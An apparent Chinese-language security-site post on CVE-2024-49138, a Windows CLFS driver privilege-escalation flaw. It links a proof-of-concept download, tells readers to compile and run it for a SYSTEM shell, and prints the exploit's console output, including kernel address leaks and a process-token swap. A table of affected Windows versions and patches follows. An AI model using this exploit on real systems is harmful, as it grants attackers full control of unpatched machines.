CVE-2024-49138简介
Windows 通用日志文件系统驱动程序特权提升漏洞。CrowdStrike 检测到威胁行为者积极利用该漏洞。
CVE-2024-49138 POC exp下载地址
CVE-2024-49138-POC.zip测试
在Windows 11 23h2上测试成功。编译并运行
编译 x64 发布版本。运行并获取系统shell。
代码:
PS C:\Users\IEUser\Desktop> whoami
windows11\ieuser
PS C:\Users\IEUser\Desktop> .\CVE-2024-49138-POC.exe
Directory created successfully: C:\temp
Directory created successfully: C:\temp
file opened successfully
AddLogContainer successful
hResource = 0x00007FF7CDB89080
hResource = 0x00007FF7CDB890A0
pResourceData = 0x00007FF7CDB890A0
Resource size: 65536 bytes
Resource written to output.bin successfully.
Kernel Base Address: 0xFFFFF80339800000
Kernel Name: ntoskrnl.exe
NtReadVirtualMemory = 0x00007FFFAF0EFB40
NtWriteVirtualMemory = 0x00007FFFAF0EFAA0
pcclfscontainer = 0x0000000002100000
address_to_write = 0xFFFFC201424CC2B2
Process priority set to REALTIME_PRIORITY_CLASS.
Thread priority set to the highest level: TIME_CRITICAL.
triggering vuln...CreateLogFile failed with error 6601
Process priority set to NORMAL_PRIORITY_CLASS.
Thread priority set to the highest level: THREAD_PRIORITY_NORMAL.
vuln triggered
reading base of ntoskrnl to check we have arbitrary read/write
buf = 0x0000000300905A4D
swapping tokens...
current token address = 0xFFFFC201423EC578
systemtoken = 0xFFFFD401F501C6E9
Overwriting process token..
token swapped. Restoring PreviousMode and spawning system shell...
Microsoft Windows [Version 10.0.22631.2861]
(c) Microsoft Corporation. All rights reserved.
C:\Users\IEUser\Desktop>whoami
nt authority\system
C:\Users\IEUser\Desktop>视频演示
漏洞影响范围及补丁下载链接
| 发布日期 | 受影响的产品 | 影响 | 最高严重性 | 文章 | 补丁下载 | 构建编号 |
| 2024年12月10日 | Windows Server 2008 R2 for x64-based Systems Service Pack 1 | 提权 | 严重 | 5048695 | Monthly Rollup | 6.1.7601.27467 |
| 2024年12月10日 | Windows Server 2008 R2 for x64-based Systems Service Pack 1 | 提权 | 严重 | 5048676 | Security Only | 6.1.7601.27467 |
| 2024年12月10日 | Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) | 提权 | 严重 | 5048710 | Monthly Rollup | 6.0.6003.23016 |
| 2024年12月10日 | Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) | 提权 | 严重 | 5048744 | Security Only | 6.0.6003.23016 |
| 2024年12月10日 | Windows Server 2008 for x64-based Systems Service Pack 2 | 提权 | 严重 | 5048710 | Monthly Rollup | 6.0.6003.23016 |
| 2024年12月10日 | Windows Server 2008 for x64-based Systems Service Pack 2 | 提权 | 严重 | 5048744 | Security Only | 6.0.6003.23016 |
| 2024年12月10日 | Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) | 提权 | 严重 | 5048710 | Monthly Rollup | 6.0.6003.23016 |
| 2024年12月10日 | Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) | 提权 | 严重 | 5048744 | Security Only | 6.0.6003.23016 |
| 2024年12月10日 | Windows Server 2008 for 32-bit Systems Service Pack 2 | 提权 | 严重 | 5048710 | Monthly Rollup | 6.0.6003.23016 |
| 2024年12月10日 | Windows Server 2008 for 32-bit Systems Service Pack 2 | 提权 | 严重 | 5048744 | Security Only | 6.0.6003.23016 |
| 2024年12月10日 | Windows Server 2016 (Server Core installation) | 提权 | 严重 | 5048671 | Security Update | 10.0.14393.7606 |
| 2024年12月10日 | Windows Server 2016 | 提权 | 严重 | 5048671 | Security Update | 10.0.14393.7606 |
| 2024年12月10日 | Windows 10 Version 1607 for x64-based Systems | 提权 | 严重 | 5048671 | Security Update | 10.0.14393.7606 |
| 2024年12月10日 | Windows 10 Version 1607 for 32-bit Systems | 提权 | 严重 | 5048671 | Security Update | 10.0.14393.7606 |
| 2024年12月10日 | Windows 10 for x64-based Systems | 提权 | 严重 | 5048703 | Security Update | 10.0.10240.20857 |
| 2024年12月10日 | Windows 10 for 32-bit Systems | 提权 | 严重 | 5048703 | Security Update | 10.0.10240.20857 |
| 2024年12月10日 | Windows Server 2025 | 提权 | 严重 | 5048667 | Security Update | 10.0.26100.2605 |
| 2024年12月10日 | Windows Server 2025 | 提权 | 严重 | 5048794 | SecurityHotpatchUpdate | 10.0.26100.2528 |
| 2024年12月10日 | Windows 11 Version 24H2 for x64-based Systems | 提权 | 严重 | 5048667 | Security Update | 10.0.26100.2605 |
| 2024年12月10日 | Windows 11 Version 24H2 for x64-based Systems | 提权 | 严重 | 5048794 | SecurityHotpatchUpdate | 10.0.26100.2528 |
| 2024年12月10日 | Windows 11 Version 24H2 for ARM64-based Systems | 提权 | 严重 | 5048667 | Security Update | 10.0.26100.2605 |
| 2024年12月10日 | Windows 11 Version 24H2 for ARM64-based Systems | 提权 | 严重 | 5048794 | SecurityHotpatchUpdate | 10.0.26100.2528 |
| 2024年12月10日 | Windows Server 2022, 23H2 Edition (Server Core installation) | 提权 | 严重 | 5048653 | Security Update | 10.0.25398.1308 |
| 2024年12月10日 | Windows 11 Version 23H2 for x64-based Systems | 提权 | 严重 | 5048685 | Security Update | 10.0.22631.4602 |
| 2024年12月10日 | Windows 11 Version 23H2 for ARM64-based Systems | 提权 | 严重 | 5048685 | Security Update | 10.0.22631.4602 |
| 2024年12月10日 | Windows Server 2025 (Server Core installation) | 提权 | 严重 | 5048667 | Security Update | 10.0.26100.2605 |
| 2024年12月10日 | Windows Server 2025 (Server Core installation) | 提权 | 严重 | 5048794 | SecurityHotpatchUpdate | 10.0.26100.2528 |
| 2024年12月10日 | Windows 10 Version 22H2 for 32-bit Systems | 提权 | 严重 | 5048652 | Security Update | 10.0.19045.5247 |
| 2024年12月10日 | Windows 10 Version 22H2 for ARM64-based Systems | 提权 | 严重 | 5048652 | Security Update | 10.0.19045.5247 |
| 2024年12月10日 | Windows 10 Version 22H2 for x64-based Systems | 提权 | 严重 | 5048652 | Security Update | 10.0.19045.5247 |
| 2024年12月10日 | Windows 11 Version 22H2 for x64-based Systems | 提权 | 严重 | 5048685 | Security Update | 10.0.22621.4602 |
| 2024年12月10日 | Windows 11 Version 22H2 for ARM64-based Systems | 提权 | 严重 | 5048685 | Security Update | 10.0.22621.4602 |
| 2024年12月10日 | Windows 10 Version 21H2 for x64-based Systems | 提权 | 严重 | 5048652 | Security Update | 10.0.19044.5247 |
| 2024年12月10日 | Windows 10 Version 21H2 for ARM64-based Systems | 提权 | 严重 | 5048652 | Security Update | 10.0.19044.5247 |
| 2024年12月10日 | Windows 10 Version 21H2 for 32-bit Systems | 提权 | 严重 | 5048652 | Security Update | 10.0.19044.5247 |
| 2024年12月10日 | Windows Server 2022 (Server Core installation) | 提权 | 严重 | 5048654 | Security Update | 10.0.20348.2966 |
| 2024年12月10日 | Windows Server 2022 (Server Core installation) | 提权 | 严重 | 5048800 | SecurityHotpatchUpdate | 10.0.20348.2908 |
| 2024年12月10日 | Windows Server 2022 | 提权 | 严重 | 5048654 | Security Update | 10.0.20348.2966 |
| 2024年12月10日 | Windows Server 2022 | 提权 | 严重 | 5048800 | SecurityHotpatchUpdate | 10.0.20348.2908 |
| 2024年12月10日 | Windows Server 2019 (Server Core installation) | 提权 | 严重 | 5048661 | Security Update | 10.0.17763.6659 |
| 2024年12月10日 | Windows Server 2019 | 提权 | 严重 | 5048661 | Security Update | 10.0.17763.6659 |
| 2024年12月10日 | Windows 10 Version 1809 for x64-based Systems | 提权 | 严重 | 5048661 | Security Update | 10.0.17763.6659 |
| 2024年12月10日 | Windows 10 Version 1809 for 32-bit Systems | 提权 | 严重 | 5048661 | Security Update | 10.0.17763.6659 |
| 2024年12月10日 | Windows Server 2012 R2 (Server Core installation) | 提权 | 严重 | 5048735 | Monthly Rollup | 6.3.9600.22318 |
| 2024年12月10日 | Windows Server 2012 R2 | 提权 | 严重 | 5048735 | Monthly Rollup | 6.3.9600.22318 |
| 2024年12月10日 | Windows Server 2012 (Server Core installation) | 提权 | 严重 | 5048699 | Monthly Rollup | 6.2.9200.25222 |
| 2024年12月10日 | Windows Server 2012 | 提权 | 严重 | 5048699 | Monthly Rollup | 6.2.9200.25222 |
| 2024年12月10日 | Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) | 提权 | 严重 | 5048695 | Monthly Rollup | 6.1.7601.27467 |
| 2024年12月10日 | Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) | 提权 | 严重 | 5048676 | Security Only | 6.1.7601.27467 |
![网站入侵渗透测试小白入门最详细全面讲解[2024最新版文章教程]](https://hackhub.org/data/attachments/0/62-4a31f0b6cc5fadc7e4e04314e082dd2e.jpg){kind=small}